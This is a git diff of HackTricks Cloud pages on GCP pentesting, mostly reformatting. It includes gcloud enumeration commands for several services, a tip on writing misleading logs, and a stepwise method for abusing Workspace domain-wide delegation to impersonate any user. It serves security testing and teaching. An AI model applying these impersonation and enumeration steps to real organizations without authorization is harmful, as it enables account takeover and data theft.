+- **Assets**: This section **shows all the assets being used**, very useful for sysadmins (and maybe attacker) to see what is running in a single page.
+- **Findings**: This **aggregates** in a **table findings** of different sections of GCP Security (not only Command Center) to be able to visualize easily findings that matters.
+- **Sources**: Shows a **summary of findings** of all the different sections of GCP security **by sectio**n.
+- **Posture**: \[Premium Required] Security Posture allows to **define, assess, and monitor the security of the GCP environment**. It works by creating policy that defines constraints or restrictions that controls/monitor the resources in GCP. There are several pre-defined posture templates that can be found in [https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy](https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy)
 
 ### **Threats**
 
@@ -38,16 +25,15 @@ From the perspective of an attacker, this is probably the **most interesting fea
 
 There are 3 types of threat detection mechanisms:
 
-* **Event Threats**: Findings produced by matching events from **Cloud Logging** based on **rules created** internally by Google. It can also scan **Google Workspace logs**.
-  * It's possible to find the description of all the [**detection rules in the docs**](https://cloud.google.com/security-command-center/docs/concepts-event-threat-detection-overview?authuser=2#how_works)
-* **Container Threats**: Findings produced after analyzing low-level behavior of the kernel of containers.
-* **Custom Threats**: Rules created by the company.
+- **Event Threats**: Findings produced by matching events from **Cloud Logging** based on **rules created** internally by Google. It can also scan **Google Workspace logs**.
+  - It's possible to find the description of all the [**detection rules in the docs**](https://cloud.google.com/security-command-center/docs/concepts-event-threat-detection-overview?authuser=2#how_works)
+- **Container Threats**: Findings produced after analyzing low-level behavior of the kernel of containers.
+- **Custom Threats**: Rules created by the company.
 
-It's possible to find recommended responses to detected threats of both types in [https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event\_response](https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event_response)
+It's possible to find recommended responses to detected threats of both types in [https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event_response](https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event_response)
 
 ### Enumeration
 
-{% code overflow="wrap" %}
 ```bash
 # Get a source
 gcloud scc sources describe  --source=5678
@@ -59,62 +45,48 @@ gcloud scc notifications list 
 # Get findings (if not premium these are just vulnerabilities)
 gcloud scc findings list 
 ```
-{% endcode %}
 
 ### Post Exploitation
 
-{% content-ref url="../gcp-post-exploitation/gcp-security-post-exploitation.md" %}
-[gcp-security-post-exploitation.md](../gcp-post-exploitation/gcp-security-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-post-exploitation/gcp-security-post-exploitation.md
+{{#endref}}
 
 ## Detections and Controls
 
-* **Chronicle SecOps**: An advanced security operations suite designed to help teams increase their speed and impact of security operations, including threat detection, investigation, and response.
-* **reCAPTCHA Enterprise**: A service that protects websites from fraudulent activities like scraping, credential stuffing, and automated attacks by distinguishing between human users and bots.
-* **Web Security Scanner**: Automated security scanning tool that detects vulnerabilities and common security issues in web applications hosted on Google Cloud or another web service.
-* **Risk Manager**: A governance, risk, and compliance (GRC) tool that helps organizations assess, document, and understand their Google Cloud risk posture.
-* **Binary Authorization**: A security control for containers that ensures only trusted container images are deployed on Kubernetes Engine clusters according to policies set by the enterprise.
-* **Advisory Notifications**: A service that provides alerts and advisories about potential security issues, vulnerabilities, and recommended actions to keep resources secure.
-* **Access Approval**: A feature that allows organizations to require explicit approval before Google employees can access their data or configurations, providing an additional layer of control and auditability.
-* **Managed Microsoft AD**: A service offering managed Microsoft Active Directory (AD) that allows users to use their existing Microsoft AD-dependent apps and workloads on Google Cloud.
+- **Chronicle SecOps**: An advanced security operations suite designed to help teams increase their speed and impact of security operations, including threat detection, investigation, and response.
+- **reCAPTCHA Enterprise**: A service that protects websites from fraudulent activities like scraping, credential stuffing, and automated attacks by distinguishing between human users and bots.
+- **Web Security Scanner**: Automated security scanning tool that detects vulnerabilities and common security issues in web applications hosted on Google Cloud or another web service.
+- **Risk Manager**: A governance, risk, and compliance (GRC) tool that helps organizations assess, document, and understand their Google Cloud risk posture.
+- **Binary Authorization**: A security control for containers that ensures only trusted container images are deployed on Kubernetes Engine clusters according to policies set by the enterprise.
+- **Advisory Notifications**: A service that provides alerts and advisories about potential security issues, vulnerabilities, and recommended actions to keep resources secure.
+- **Access Approval**: A feature that allows organizations to require explicit approval before Google employees can access their data or configurations, providing an additional layer of control and auditability.
+- **Managed Microsoft AD**: A service offering managed Microsoft Active Directory (AD) that allows users to use their existing Microsoft AD-dependent apps and workloads on Google Cloud.
 
 ## Data Protection
 
-* **Sensitive Data Protection**: Tools and practices aimed at safeguarding sensitive data, such as personal information or intellectual property, against unauthorized access or exposure.
-* **Data Loss Prevention (DLP)**: A set of tools and processes used to identify, monitor, and protect data in use, in motion, and at rest through deep content inspection and by applying a comprehensive set of data protection rules.
-* **Certificate Authority Service**: A scalable and secure service that simplifies and automates the management, deployment, and renewal of SSL/TLS certificates for internal and external services.
-* **Key Management**: A cloud-based service that allows you to manage cryptographic keys for your applications, including the creation, import, rotation, use, and destruction of encryption keys. More info in:
+- **Sensitive Data Protection**: Tools and practices aimed at safeguarding sensitive data, such as personal information or intellectual property, against unauthorized access or exposure.
+- **Data Loss Prevention (DLP)**: A set of tools and processes used to identify, monitor, and protect data in use, in motion, and at rest through deep content inspection and by applying a comprehensive set of data protection rules.
+- **Certificate Authority Service**: A scalable and secure service that simplifies and automates the management, deployment, and renewal of SSL/TLS certificates for internal and external services.
+- **Key Management**: A cloud-based service that allows you to manage cryptographic keys for your applications, including the creation, import, rotation, use, and destruction of encryption keys. More info in:
 
-{% content-ref url="gcp-kms-enum.md" %}
-[gcp-kms-enum.md](gcp-kms-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-kms-enum.md
+{{#endref}}
 
-* **Certificate Manager**: A service that manages and deploys SSL/TLS certificates, ensuring secure and encrypted connections to your web services and applications.
-* **Secret Manager**: A secure and convenient storage system for API keys, passwords, certificates, and other sensitive data, which allows for the easy and secure access and management of these secrets in applications. More info in:
+- **Certificate Manager**: A service that manages and deploys SSL/TLS certificates, ensuring secure and encrypted connections to your web services and applications.
+- **Secret Manager**: A secure and convenient storage system for API keys, passwords, certificates, and other sensitive data, which allows for the easy and secure access and management of these secrets in applications. More info in:
 
-{% content-ref url="gcp-secrets-manager-enum.md" %}
-[gcp-secrets-manager-enum.md](gcp-secrets-manager-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-secrets-manager-enum.md
+{{#endref}}
 
 ## Zero Trust
 
-* **BeyondCorp Enterprise**: A zero-trust security platform that enables secure access to internal applications without the need for a traditional VPN, by relying on verification of user and device trust before granting access.
-* **Policy Troubleshooter**: A tool designed to help administrators understand and resolve access issues in their organization by identifying why a user has access to certain resources or why access was denied, thereby aiding in the enforcement of zero-trust policies.
-* **Identity-Aware Proxy (IAP)**: A service that controls access to cloud applications and VMs running on Google Cloud, on-premises, or other clouds, based on the identity and the context of the request rather than by the network from which the request originates.
-* **VPC Service Controls**: Security perimeters that provide additional layers of protection to resources and services hosted in Google Cloud's Virtual Private Cloud (VPC), preventing data exfiltration and providing granular access control.
-* **Access Context Manager**: Part of Google Cloud's BeyondCorp Enterprise, this tool helps define and enforce fine-grained access control policies based on a user's identity and the context of their request, such as device security status, IP address, and more.
+- **BeyondCorp Enterprise**: A zero-trust security platform that enables secure access to internal applications without the need for a traditional VPN, by relying on verification of user and device trust before granting access.
+- **Policy Troubleshooter**: A tool designed to help administrators understand and resolve access issues in their organization by identifying why a user has access to certain resources or why access was denied, thereby aiding in the enforcement of zero-trust policies.
+- **Identity-Aware Proxy (IAP)**: A service that controls access to cloud applications and VMs running on Google Cloud, on-premises, or other clouds, based on the identity and the context of the request rather than by the network from which the request originates.
+- **VPC Service Controls**: Security perimeters that provide additional layers of protection to resources and services hosted in Google Cloud's Virtual Private Cloud (VPC), preventing data exfiltration and providing granular access control.
+- **Access Context Manager**: Part of Google Cloud's BeyondCorp Enterprise, this tool helps define and enforce fine-grained access control policies based on a user's identity and the context of their request, such as device security status, IP address, and more.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
new file mode 100644
index 000000000..a578f7e4b
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
@@ -0,0 +1,67 @@
+# GCP - Source Repositories Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information 
+
+Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code.
+
+Key features of Cloud Source Repositories include:
+
+1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows.
+2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment.
+3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles.
+4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices.
+5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews.
+6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories.
+
+### OffSec information 
+
+- The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background.
+- To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**.
+- You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms).
+- It's possible to **code & debug from inside GCP**.
+- By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled.
+
+### Open In Cloud Shell
+
+It's possible to open the repository in Cloud Shell, a prompt like this one will appear:
+
+

+
+This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised).
+
+### Enumeration
+
+```bash
+# Repos enumeration
+gcloud source repos list #Get names and URLs
+gcloud source repos describe 
+gcloud source repos get-iam-policy 
+
+# gcloud repo clone
+gcloud source repos clone 
+gcloud source repos get-iam-policy 
+... git add & git commit -m ...
+git push --set-upstream origin master
+git push -u origin master
+
+# Access via git
+## To add a SSH key go to https://source.cloud.google.com/user/ssh_keys (no gcloud command)
+git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/
+git add, commit, push...
+```
+
+### Privilege Escalation & Post Exploitation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-sourcerepos-privesc.md
+{{#endref}}
+
+### Unauthenticated Enum
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md
new file mode 100644
index 000000000..671c876da
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md
@@ -0,0 +1,31 @@
+# GCP - Spanner Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
+
+Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
+
+```bash
+# Cloud Spanner
+## Instances
+gcloud spanner instances list
+gcloud spanner instances describe 
+gcloud spanner instances get-iam-policy 
+
+## Databases
+gcloud spanner databases list --instance 
+gcloud spanner databases describe --instance  
+gcloud spanner databases get-iam-policy --instance  
+gcloud spanner databases execute-sql --instance  --sql  
+
+## Backups
+gcloud spanner backups list --instance 
+gcloud spanner backups get-iam-policy --instance  
+
+## Instance Configs
+gcloud spanner instance-configs list
+gcloud spanner instance-configs describe 
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
new file mode 100644
index 000000000..f1ce0c957
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
@@ -0,0 +1,33 @@
+# GCP - Stackdriver Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [Stackdriver logging](https://cloud.google.com/sdk/gcloud/reference/logging/)
+
+[**Stackdriver**](https://cloud.google.com/stackdriver/) is recognized as a comprehensive infrastructure **logging suite** offered by Google. It has the capability to capture sensitive data through features like syslog, which reports individual commands executed inside Compute Instances. Furthermore, it monitors HTTP requests sent to load balancers or App Engine applications, network packet metadata within VPC communications, and more.
+
+For a Compute Instance, the corresponding service account requires merely **WRITE** permissions to facilitate logging of instance activities. Nonetheless, it's possible that an administrator might **inadvertently** provide the service account with both **READ** and **WRITE** permissions. In such instances, the logs can be scrutinized for sensitive information.
+
+To accomplish this, the [gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) utility offers a set of tools. Initially, identifying the types of logs present in your current project is recommended.
+
+```bash
+# List logs
+gcloud logging logs list
+
+# Read logs
+gcloud logging read [FOLDER]
+
+# Write logs
+# An attacker writing logs may confuse the Blue Team
+gcloud logging write [FOLDER] [MESSAGE]
+
+# List Buckets
+gcloud logging buckets list
+```
+
+## References
+
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
+- [https://initblog.com/2020/gcp-post-exploitation/](https://initblog.com/2020/gcp-post-exploitation/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md
similarity index 61%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md
index 03e35e3e8..c3c590471 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md
@@ -1,19 +1,6 @@
 # GCP - Storage Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Storage
 
@@ -23,11 +10,11 @@ The bucket can be stored in a region, in 2 regions or **multi-region (default)**
 
 ### Storage Types
 
-* **Standard Storage**: This is the default storage option that **offers high-performance, low-latency access to frequently accessed data**. It is suitable for a wide range of use cases, including serving website content, streaming media, and hosting data analytics pipelines.
-* **Nearline Storage**: This storage class offers **lower storage costs** and **slightly higher access costs** than Standard Storage. It is optimized for infrequently accessed data, with a minimum storage duration of 30 days. It is ideal for backup and archival purposes.
-* **Coldline Storage**: This storage class is optimized for **long-term storage of infrequently accessed data**, with a minimum storage duration of 90 days. It offers the **lower storage costs** than Nearline Storage, but with **higher access costs.**
-* **Archive Storage**: This storage class is designed for cold data that is accessed **very infrequently**, with a minimum storage duration of 365 days. It offers the **lowest storage costs of all GCP storage options** but with the **highest access costs**. It is suitable for long-term retention of data that needs to be stored for compliance or regulatory reasons.
-* **Autoclass**: If you **don't know how much you are going to access** the data you can select Autoclass and GCP will **automatically change the type of storage for you to minimize costs**.
+- **Standard Storage**: This is the default storage option that **offers high-performance, low-latency access to frequently accessed data**. It is suitable for a wide range of use cases, including serving website content, streaming media, and hosting data analytics pipelines.
+- **Nearline Storage**: This storage class offers **lower storage costs** and **slightly higher access costs** than Standard Storage. It is optimized for infrequently accessed data, with a minimum storage duration of 30 days. It is ideal for backup and archival purposes.
+- **Coldline Storage**: This storage class is optimized for **long-term storage of infrequently accessed data**, with a minimum storage duration of 90 days. It offers the **lower storage costs** than Nearline Storage, but with **higher access costs.**
+- **Archive Storage**: This storage class is designed for cold data that is accessed **very infrequently**, with a minimum storage duration of 365 days. It offers the **lowest storage costs of all GCP storage options** but with the **highest access costs**. It is suitable for long-term retention of data that needs to be stored for compliance or regulatory reasons.
+- **Autoclass**: If you **don't know how much you are going to access** the data you can select Autoclass and GCP will **automatically change the type of storage for you to minimize costs**.
 
 ### Access Control
 
@@ -64,12 +51,13 @@ An HMAC key is a type of _credential_ and can be **associated with a service acc
 
 HMAC keys have two primary pieces, an _access ID_ and a _secret_.
 
-*   **Access ID**: An alphanumeric string linked to a specific service or user account. When linked to a service account, the string is 61 characters in length, and when linked to a user account, the string is 24 characters in length. The following shows an example of an access ID:
+- **Access ID**: An alphanumeric string linked to a specific service or user account. When linked to a service account, the string is 61 characters in length, and when linked to a user account, the string is 24 characters in length. The following shows an example of an access ID:
 
-    `GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA`
-*   **Secret**: A 40-character Base-64 encoded string that is linked to a specific access ID. A secret is a preshared key that only you and Cloud Storage know. You use your secret to create signatures as part of the authentication process. The following shows an example of a secret:
+  `GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA`
 
-    `bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ`
+- **Secret**: A 40-character Base-64 encoded string that is linked to a specific access ID. A secret is a preshared key that only you and Cloud Storage know. You use your secret to create signatures as part of the authentication process. The following shows an example of a secret:
+
+  `bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ`
 
 Both the **access ID and secret uniquely identify an HMAC key**, but the secret is much more sensitive information, because it's used to **create signatures**.
 
@@ -143,39 +131,26 @@ list_bucket_objects('')
 
 In the following page you can check how to **abuse storage permissions to escalate privileges**:
 
-{% content-ref url="../gcp-privilege-escalation/gcp-storage-privesc.md" %}
-[gcp-storage-privesc.md](../gcp-privilege-escalation/gcp-storage-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-privilege-escalation/gcp-storage-privesc.md
+{{#endref}}
 
 ### Unauthenticated Enum
 
-{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/" %}
-[gcp-storage-unauthenticated-enum](../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/
+{{#endref}}
 
 ### Post Exploitation
 
-{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %}
-[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-post-exploitation/gcp-storage-post-exploitation.md
+{{#endref}}
 
 ### Persistence
 
-{% content-ref url="../gcp-persistence/gcp-storage-persistence.md" %}
-[gcp-storage-persistence.md](../gcp-persistence/gcp-storage-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-persistence/gcp-storage-persistence.md
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
new file mode 100644
index 000000000..1492b3cb3
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
@@ -0,0 +1,38 @@
+# GCP - Workflows Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Google Cloud Platform (GCP) Workflows** is a service that helps you automate tasks that involve **multiple steps** across Google Cloud services and other web-based services. Think of it as a way to set up a **sequence of actions** that run on their own once triggered. You can design these sequences, called workflows, to do things like process data, handle software deployments, or manage cloud resources without having to manually oversee each step.
+
+### Encryption
+
+Related to encryption, by default the **Google-managed encryption key is use**d but it's possible to make it use a key of by customers.
+
+## Enumeration
+
+> [!CAUTION]
+> You can also check the output of previous executions to look for sensitive information
+
+```bash
+# List Workflows
+gcloud workflows list
+
+# Get info and yaml of an specific workflow
+gcloud workflows describe 
+
+# List executions
+gcloud workflows executions list workflow-1
+
+# Get execution info and output
+gcloud workflows executions describe projects//locations//workflows//executions/
+```
+
+### Privesc and Post Exploitation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-workflows-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md b/src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
similarity index 68%
rename from pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
rename to src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
index c6354c263..9358b40c2 100644
--- a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
@@ -1,19 +1,6 @@
 # GCP <--> Workspace Pivoting
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## **From GCP to GWS**
 
@@ -21,25 +8,23 @@ Learn & practice GCP Hacking:  [!NOTE]
+> This basically means that **service accounts** inside GCP projects of an organization might be able to i**mpersonate Workspace users** of the same organization (or even from a different one).
 
 For more information about how this exactly works check:
 
-{% content-ref url="gcp-understanding-domain-wide-delegation.md" %}
-[gcp-understanding-domain-wide-delegation.md](gcp-understanding-domain-wide-delegation.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-understanding-domain-wide-delegation.md
+{{#endref}}
 
 ### Compromise existing delegation
 
 If an attacker **compromised some access over GCP** and **known a valid Workspace user email** (preferably **super admin**) of the company, he could **enumerate all the projects** he has access to, **enumerate all the SAs** of the projects, check to which **service accounts he has access to**, and **repeat** all these steps with each SA he can impersonate.\
 With a **list of all the service accounts** he has **access** to and the list of **Workspace** **emails**, the attacker could try to **impersonate user with each service account**.
 
-{% hint style="danger" %}
-Note that when configuring the domain wide delegation no Workspace user is needed, therefore just know **one valid one is enough and required for the impersonation**.\
-However, the **privileges of the impersonated user will be used**, so if it's Super Admin you will be able to access everything. If it doesn't have any access this will be useless.
-{% endhint %}
+> [!CAUTION]
+> Note that when configuring the domain wide delegation no Workspace user is needed, therefore just know **one valid one is enough and required for the impersonation**.\
+> However, the **privileges of the impersonated user will be used**, so if it's Super Admin you will be able to access everything. If it doesn't have any access this will be useless.
 
 #### [GCP Generate Delegation Token](https://github.com/carlospolop/gcp_gen_delegation_token)
 
@@ -61,7 +46,7 @@ This is a tool that can perform the attack following these steps:
 2. Iterate on each project resource, and **enumerate GCP Service account resources** to which the initial IAM user has access using _GetIAMPolicy_.
 3. Iterate on **each service account role**, and find built-in, basic, and custom roles with _**serviceAccountKeys.create**_ permission on the target service account resource. It should be noted that the Editor role inherently possesses this permission.
 4. Create a **new `KEY_ALG_RSA_2048`** private key to each service account resource which is found with relevant permission in the IAM policy.
-5. Iterate on **each new service account and create a `JWT`** **object** for it which is composed of the SA private key credentials and an OAuth scope. The process of creating a new _JWT_ object will **iterate on all the existing combinations of OAuth scopes** from **oauth\_scopes.txt** list, in order to find all the delegation possibilities. The list **oauth\_scopes.txt** is updated with all of the OAuth scopes we’ve found to be relevant for abusing Workspace identities.
+5. Iterate on **each new service account and create a `JWT`** **object** for it which is composed of the SA private key credentials and an OAuth scope. The process of creating a new _JWT_ object will **iterate on all the existing combinations of OAuth scopes** from **oauth_scopes.txt** list, in order to find all the delegation possibilities. The list **oauth_scopes.txt** is updated with all of the OAuth scopes we’ve found to be relevant for abusing Workspace identities.
 6. The `_make_authorization_grant_assertion` method reveals the necessity to declare a t**arget workspace user**, referred to as _subject_, for generating JWTs under DWD. While this may seem to require a specific user, it's important to realize that **DWD influences every identity within a domain**. Consequently, creating a JWT for **any domain user** affects all identities in that domain, consistent with our combination enumeration check. Simply put, one valid Workspace user is adequate to move forward.\
    This user can be defined in DeleFriend’s _config.yaml_ file. If a target workspace user is not already known, the tool facilitates the automatic identification of valid workspace users by scanning domain users with roles on GCP projects. It's key to note (again) that JWTs are domain-specific and not generated for every user; hence, the automatic process targets a single unique identity per domain.
 7. **Enumerate and create a new bearer access token** for each JWT and validate the token against tokeninfo API.
@@ -100,11 +85,11 @@ An attacker with the ability to **create service accounts in a GCP project** and
 
 1. **Generating a New Service Account and Corresponding Key Pair:** On GCP, new service account resources can be produced either interactively via the console or programmatically using direct API calls and CLI tools. This requires the **role `iam.serviceAccountAdmin`** or any custom role equipped with the **`iam.serviceAccounts.create`** **permission**. Once the service account is created, we'll proceed to generate a **related key pair** (**`iam.serviceAccountKeys.create`** permission).
 2. **Creation of new delegation**: It's important to understand that **only the Super Admin role possesses the capability to set up global Domain-Wide delegation in Google Workspace** and Domain-Wide delegation **cannot be set up programmatically,** It can only be created and adjusted **manually** through the Google Workspace **console**.
-   * The creation of the rule can be found under the page **API controls → Manage Domain-Wide delegation in Google Workspace Admin console**.
+   - The creation of the rule can be found under the page **API controls → Manage Domain-Wide delegation in Google Workspace Admin console**.
 3. **Attaching OAuth scopes privilege**: When configuring a new delegation, Google requires only 2 parameters, the Client ID, which is the **OAuth ID of the GCP Service Account** resource, and **OAuth scopes** that define what API calls the delegation requires.
-   * The **full list of OAuth scopes** can be found [**here**](https://developers.google.com/identity/protocols/oauth2/scopes), but here is a recommendation: `https://www.googleapis.com/auth/userinfo.email, https://www.googleapis.com/auth/cloud-platform, https://www.googleapis.com/auth/admin.directory.group, https://www.googleapis.com/auth/admin.directory.user, https://www.googleapis.com/auth/admin.directory.domain, https://mail.google.com/, https://www.googleapis.com/auth/drive, openid`
+   - The **full list of OAuth scopes** can be found [**here**](https://developers.google.com/identity/protocols/oauth2/scopes), but here is a recommendation: `https://www.googleapis.com/auth/userinfo.email, https://www.googleapis.com/auth/cloud-platform, https://www.googleapis.com/auth/admin.directory.group, https://www.googleapis.com/auth/admin.directory.user, https://www.googleapis.com/auth/admin.directory.domain, https://mail.google.com/, https://www.googleapis.com/auth/drive, openid`
 4. **Acting on behalf of the target identity:** At this point, we have a functioning delegated object in GWS. Now, **using the GCP Service Account private key, we can perform API calls** (in the scope defined in the OAuth scope parameter) to trigger it and **act on behalf of any identity that exists in Google Workspace**. As we learned, the service account will generate access tokens per its needs and according to the permission he has to REST API applications.
-   * Check the **previous section** for some **tools** to use this delegation.
+   - Check the **previous section** for some **tools** to use this delegation.
 
 #### Cross-Organizational delegation
 
